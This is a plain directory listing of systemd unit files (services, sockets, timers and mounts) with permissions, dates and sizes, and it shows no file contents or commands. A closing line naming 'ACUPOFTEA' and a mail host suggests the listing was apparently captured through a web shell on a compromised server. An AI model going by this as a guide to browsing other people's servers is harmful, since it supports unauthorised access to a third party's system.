-rw-r--r--
2025-04-22 01:58:34
systemd-localed.service
text/plain
1.05 KB
-rw-r--r--
2025-04-22 01:58:34
systemd-logind.service
text/plain
1.35 KB
-rw-r--r--
2025-04-22 01:58:34
systemd-machine-id-commit.service
text/plain
737 B
-rw-r--r--
2025-04-22 01:58:34
systemd-modules-load.service
text/plain
1011 B
-rw-r--r--
2025-04-22 01:58:34
systemd-portabled.service
text/plain
987 B
-rw-r--r--
2025-04-22 01:58:34
systemd-poweroff.service
text/plain
556 B
-rw-r--r--
2025-04-22 01:58:07
systemd-pstore.service
text/plain
840 B
-rw-r--r--
2025-04-22 01:58:34
systemd-quotacheck.service
text/plain
663 B
-rw-r--r--
2025-04-22 01:58:34
systemd-random-seed.service
text/plain
800 B
-rw-r--r--
2025-04-22 01:58:34
systemd-reboot.service
text/plain
551 B
-rw-r--r--
2025-04-22 01:58:07
systemd-remount-fs.service
text/plain
802 B
-rw-r--r--
2025-04-22 01:58:34
systemd-resolved.service
text/plain
1.63 KB
-rw-r--r--
2025-04-22 01:58:34
systemd-rfkill.service
text/plain
728 B
-rw-r--r--
2025-04-22 01:58:34
systemd-rfkill.socket
text/plain
657 B
-rw-r--r--
2018-06-22 11:11:49
systemd-suspend-then-hibernate.service
text/plain
600 B
-rw-r--r--
2025-04-22 01:58:34
systemd-suspend.service
text/plain
541 B
-rw-r--r--
2025-04-22 01:58:34
systemd-sysctl.service
text/plain
697 B
-rw-r--r--
2025-04-22 01:58:34
systemd-sysusers.service
text/plain
704 B
-rw-r--r--
2025-04-22 01:58:34
systemd-timedated.service
text/plain
1.02 KB
-rw-r--r--
2025-04-22 01:58:34
systemd-tmpfiles-clean.service
text/plain
663 B
-rw-r--r--
2025-04-22 01:58:34
systemd-tmpfiles-clean.timer
text/plain
490 B
-rw-r--r--
2018-06-22 11:11:49
systemd-tmpfiles-setup-dev.service
text/plain
771 B
-rw-r--r--
2025-04-22 01:58:34
systemd-tmpfiles-setup.service
text/plain
751 B
-rw-r--r--
2025-04-22 01:58:34
systemd-udev-settle.service
text/plain
867 B
-rw-r--r--
2025-04-22 01:58:34
systemd-udev-trigger.service
text/plain
771 B
-rw-r--r--
2025-04-22 01:58:34
systemd-udevd-control.socket
text/plain
635 B
-rw-r--r--
2018-06-22 11:11:49
systemd-udevd-kernel.socket
text/plain
610 B
-rw-r--r--
2018-06-22 11:11:49
systemd-udevd.service
text/plain
1.04 KB
-rw-r--r--
2025-04-22 01:58:34
systemd-update-done.service
text/plain
674 B
-rw-r--r--
2025-04-22 01:58:34
systemd-update-utmp-runlevel.service
text/plain
801 B
-rw-r--r--
2025-04-22 01:58:34
systemd-update-utmp.service
text/plain
802 B
-rw-r--r--
2025-04-22 01:58:34
systemd-user-sessions.service
text/plain
636 B
-rw-r--r--
2025-04-22 01:58:34
systemd-vconsole-setup.service
text/plain
622 B
-rw-r--r--
2025-04-22 01:58:34
systemd-volatile-root.service
text/plain
694 B
-rw-r--r--
2025-04-22 01:58:34
tcsd.service
text/plain
128 B
-rw-r--r--
2024-04-06 12:42:23
teamd@.service
text/plain
244 B
-rw-r--r--
2020-07-26 09:58:14
time-sync.target
text/plain
435 B
-rw-r--r--
2018-06-22 11:11:49
timedatex.service
text/plain
238 B
-rw-r--r--
2017-11-07 10:27:11
timers.target
text/plain
445 B
-rw-r--r--
2018-06-22 11:11:49
tmp.mount
text/plain
782 B
-rw-r--r--
2025-04-22 01:57:51
tuned.service
text/plain
439 B
-rw-r--r--
2024-02-22 12:23:28
umount.target
text/plain
457 B
-rw-r--r--
2018-06-22 11:11:49
unbound-anchor.service
text/plain
296 B
-rw-r--r--
2025-07-28 01:28:45
unbound-anchor.timer
text/plain
346 B
-rw-r--r--
2025-07-28 01:28:45
user-runtime-dir@.service
text/plain
629 B
-rw-r--r--
2025-04-22 01:58:34
user.slice
text/plain
432 B
-rw-r--r--
2018-06-22 11:11:49
user@.service
text/plain
671 B
-rw-r--r--
2025-04-22 01:58:34
var-lib-nfs-rpc_pipefs.mount
text/plain
191 B
-rw-r--r--
2025-06-04 10:54:28
wp-toolkit-background-tasks.service
text/plain
341 B
-rw-r--r--
2025-10-02 03:34:08
wp-toolkit-scheduled-tasks.service
text/plain
339 B
-rw-r--r--
2025-10-02 03:34:08
~ ACUPOFTEA - mail.ontime-ae.com